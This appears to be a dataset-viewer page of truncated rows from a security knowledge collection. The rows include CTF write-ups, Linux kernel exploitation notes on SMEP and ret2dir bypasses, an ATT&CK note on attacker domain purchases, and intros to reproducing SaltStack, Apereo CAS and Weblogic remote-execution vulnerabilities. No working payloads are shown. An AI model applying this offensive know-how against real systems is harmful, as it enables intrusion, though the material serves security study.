##... | sec-knowleage |
# hxp CTF 2018
Team: c7f.m0d3, chivay, rodbert, Eternal, des, rev, nazywam, akrasuski1, shalom
### Table of contents
* [Tiny elves fake (misc)](misc_elves)
* [Daring (crypto)](crypto_daring)
* [UFF (crypto)](crypto_uff)
* [Curve12833227 (crypto)](crypto_curve12833227) | sec-knowleage |
### 用户代码不可执行场景介绍
起初,在内核态执行代码时,可以直接执行用户态的代码。那如果攻击者控制了内核中的执行流,就可以执行处于用户态的代码。由于用户态的代码是攻击者可控的,所以更容易实施攻击。为了防范这种攻击,研究者提出当位于内核态时,不能执行用户态的代码。在 Linux 内核中,这个防御措施的实现是与指令集架构相关的。
### x86 - SMEP - Supervisor Mode Execution Protection的开启与关闭
#### 开启
默认情况下,SMEP 保护是开启的。
如果是使用 qemu 启动的内核,我们可以在 `-append` 选项中添加 `+smep` 来开启 SMEP。
#### 关闭
在 ... | sec-knowleage |
# T1583-001-购买基础设施-域名
## 来自ATT&CK的描述
攻击者可能会购买可在对目标进行攻击中使用的域名。域名是用于代表一个或多个IP地址的可读名称。它们可以被购买,或者在某些情况下,免费获得。
攻击者可以将购买的域名用于各种目的,包括网络钓鱼、非法入侵以及C2。攻击者可以选择与合法域名相似的域名,包括通过使用同音字或使用不同的顶级域名(TLD)。攻击者还可以使用国际化域名(IDN)来创建视觉上相似的域名,以便在行动中使用。
域名注册商都有一个可公开查看的数据库,显示每个注册域名的联系信息。WHOIS服务显示私人其他信息,如他们自己的公司数据,而不是域名的所有者。攻击者可能利用这种私人WHOIS服务来掩盖关于谁拥有所... | sec-knowleage |
.\" 版权所有(c) 1993 Michael Haardt (michael@moria.de), Fri Apr 2 11:32:09 MET DST 1993
.\"
.\" 这是免费的文档;你可以遵照自由软件基金会出版的GNU通用出版许可版本2或者更高版本的条例来重新发布和/或修改它.
.\"
.\" GNU通用出版许可中涉及到的"目标代码(object code)"和"可执行程序(executables)"可解释为任意文档格式化的输出或者排版系统,包括中间的和已输出的结果.
.\"
.\" 该文档的发布寄望于能够实用,但并不做任何担保;甚至也不提供隐含的商品性的保证或者针对特殊目的适用性.参见GNU通用版权许可以获知详... | sec-knowleage |
# Slack emoji converter (web, 267p, 29 solved)
```
create your own emoji for Slack at http://emoji.chal.ctf.westerns.tokyo
```
This task is a perfect example of CTF challenge naming conventions - because the challenge has absolutely zero relation to slack, emojis, and conversions.
We are expected to exploit the website... | sec-knowleage |
# SaltStack 任意文件读写漏洞(CVE-2020-11652)
SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。
在 CVE-2020-11652 目录遍历漏洞中,攻击者通过构造恶意请求,可以读取、写入服务器上任意文件。
参考链接:
- https://labs.f-secure.com/advisories/saltstack-authorization-bypass
- [https://github.com/rossengeorgiev/salt... | sec-knowleage |
## Big Lie (forensic, 100p, 101 solves)
> Find the [flag](biglie.pcap).
### PL
[ENG](#eng-version)
Otrzymany plik pcap ładujemy do Wiresharka i na podstawie wyeksportowanych obiektach z sesji HTTP dochodzimy do wniosku, że użytkownik skorzystał z usługi pastebin, która przed wysłaniem danych szyfruje je lokalnie, a kl... | sec-knowleage |
# Plague of Boils
## Description
> > “So the Lord said to Moses and Aaron, ‘Take for yourselves handfuls of ashes from a furnace, and let Moses scatter it toward the heavens in the sight of Pharaoh. And it will become fine dust in all the land of Egypt, and it will cause boils that break out in sores on man and beast t... | sec-knowleage |
# MissingKipod
Misc., 25 points
## Description
> We were on to something with Dinary.
## Solution
This is the follow-up challenge for [Dinary](Dinary.md).
In Dinary, we received an image composed of black and white pixels. When interpreted as binary, we were able to extract the following text:
> Hello World!, Yesterday... | sec-knowleage |
# 程序执行流程
**参考 Execution Angleboye@Bamboofox 。**
## 静态执行
这里给出程序静态执行的基本过程。
## 动态执行
这里给出另外一张更加细节的图片。
## 基本操作说明
### sys_execve
该函数主要用于执行一个新的程序,即执行我们想要执行的程序,会检查相应的argv以及envp等参数。
### do_execve
该函数打开目标映像文件,并从目标文件的开始处读入指定长度的(目前为128)字节来获取相应目标文件的基本信息。
### search_binary_handler
该函数会搜索支持处理当前类型的二进制文件类型队列,以便于让各种可执行程序的处理程序进行相应的处理。
##... | sec-knowleage |
### 背包问题概述
首先,我们先来介绍一下背包问题,假定一个背包可以称重 W,现在有 n 个物品,其重量分别为 $a_1, a_2,...,a_n$ 我们想问一下装哪些物品可以恰好使得背包装满,并且每个物品只能被装一次。这其实就是在解这样的一个问题
$$
x_1a_1+x_2a_2+,...,+x_na_n=W
$$
其中所有的 $x_i$ 只能为 0 和 1。显然我们必须枚举所有的 n 个物品的组合才能解决这个问题,而复杂度也就是 $2^n$,这也就是背包加密的妙处所在。
在加密时,如果我们想要加密的明文为 x,那么我们可以将其表示为 n 位二进制数,然后分别乘上 $a_i$ 即可得到加密结果。
但是解密的时候,该怎么办呢?我们... | sec-knowleage |
### 基址重定位表概述
链接器在生成 PE 文件时,它假设执行时 PE 文件会被装载到默认的基地址处,于是将代码和数据的绝对地址都写入到 PE 文件中。如果装载时 PE 文件确实装载到了默认基地址处,就不需要进行重定位;但是,如果转载时 PE 文件装载到了别处,此时文件中的绝对地址就都失效了,因为装载基地址已经改变,代码和数据的实际地址也相应的改变了,这时就需要通过重定位修复绝对地址,使其都能指向正确的位置。
对于 EXE 文件,每个文件在执行时都会使用独立的虚拟地址空间,即总是能装载到在默认基地址处,也就不需要重定位信息;但是,同一个虚拟地址空间中可能存在多个 DLL,可能有的 DLL 就会面临默认基地址已经被占用的情况,所以 ... | sec-knowleage |
---
title: Obsidian
date: 2022-11-23 16:23:31.700412
background: bg-[#463793]
label:
tags:
-
-
categories:
- Keyboard Shortcuts
intro: |
A visual cheat-sheet for the 17 keyboard shortcuts found in the Obsidian knowledge base app.
---
Keyboard Shortcuts
------------------
### Default Shortcuts
Shortc... | sec-knowleage |
'\"
'\" Copyright (c) 1993 The Regents of the University of California.
'\" Copyright (c) 1994-1996 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: unknown.n,v 1.2 2003/11/24 05:10:0... | sec-knowleage |
# Apereo CAS 4.1 反序列化命令执行漏洞
Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。
参考链接:
- https://apereo.github.io/2016/04/08/commonsvulndisc/
## 环境搭建
执行如下命令启动一个Apereo CAS 4.1.5:
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8080/cas/login`即可查看到登录页面。
#... | sec-knowleage |
**Authors**: < [nixawk](https://github.com/nixawk) >
----
# Privilege Escalation
Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The re... | sec-knowleage |
vgscan
===
扫描并显示系统中的卷组
## 补充说明
**vgscan命令** 查找系统中存在的LVM卷组,并显示找到的卷组列表。vgscan命令仅显示找到的卷组的名称和LVM元数据类型,要得到卷组的详细信息需要使用vgdisplay命令。
### 语法
```shell
vgscan(选项)
```
### 选项
```shell
-d:调试模式;
--ignorerlockingfailure:忽略锁定失败的错误。
```
### 实例
使用vgscan命令扫描系统中所有的卷组。在命令行中输入下面的命令:
```shell
[root@localhost ~]# vgscan #扫描并显示LVM卷组列表
```
... | sec-knowleage |
# Double DES
Category: Crypto, 120 points
## Description
> I wanted an encryption service that's more secure than regular DES, but not as slow as 3DES... The flag is not in standard format.
```python
#!/usr/bin/python3 -u
from Crypto.Cipher import DES
import binascii
import itertools
import random
import string
def pad... | sec-knowleage |
### ret2dir概述
ret2dir 是哥伦比亚大学网络安全实验室在 2014 年提出的一种辅助攻击手法,主要用来**绕过 smep、smap、pxn 等用户空间与内核空间隔离的防护手段**,原论文见[此处](http://www.cs.columbia.edu/~vpk/papers/ret2dir.sec14.pdf)。
我们首先来思考一下 [x86 下的 Linux kernel 的内存布局](https://elixir.bootlin.com/linux/latest/source/Documentation/x86/x86_64/mm.rst),存在着这样的一块区域叫做 `direct mapping area`,... | sec-knowleage |
# Links
## Steganography
* [CTF Tidbits: Part 1 — Steganography](https://medium.com/@FourOctets/ctf-tidbits-part-1-steganography-ea76cc526b40)
* [Steganography 101](https://pequalsnp-team.github.io/cheatsheet/steganography-101)
## Web
* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/ma... | sec-knowleage |
---
title: Terraform 离线可视化
---
<center><h1>Terraform 离线可视化</h1></center>
---
如果 Terraform 项目比较复杂,那么可以利用 tfviz 这个工具,可视化 Terraform 项目,tfviz 项目地址:[https://github.com/steeve85/tfviz](https://github.com/steeve85/tfviz)
安装
```bash
GO111MODULE=on go get -u github.com/steeve85/tfviz
```
到 Terraform 项目目录下使用
```bash
tfviz -input... | sec-knowleage |
# Nomination
Grab Bag, 100 points
## Description:
A picture of a cat is attached:

## Solution:
[stegsolve](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve) is great for such challenges. It allows each bit plane of the image to be viewed on its own.

Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。
CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。
参考链接:
-... | sec-knowleage |
# SOC定位与功能模型选择
## 前言
安全运营中心(Security Operation Center,SOC)对于大型企业来说,常常是整体安全架构的一个核心、中心组成。但不同的企业所面临的内外部风险,以及安全团队在企业中的定位、资源分配都是千差万别的。那么对于不同规模的企业来说,SOC的定位以及功能模型的选择应该是怎么样的呢?
## 定义
首先,我们来回顾一下SOC的不同定义。
Gartner将SOC定义为一个团队,**该团队通常是昼夜不停地工作以提供7x24小时的覆盖范围,并且有专用的物理/虚拟设施(基础架构),以帮助预测、预防、检测、评估和应对安全威胁与事件**。[1]
// TODO
## References
\[1]... | sec-knowleage |
# 文件操作
## 文件上传
{% code title="FileController.java" %}
```java
package com.example.controller;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation... | sec-knowleage |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.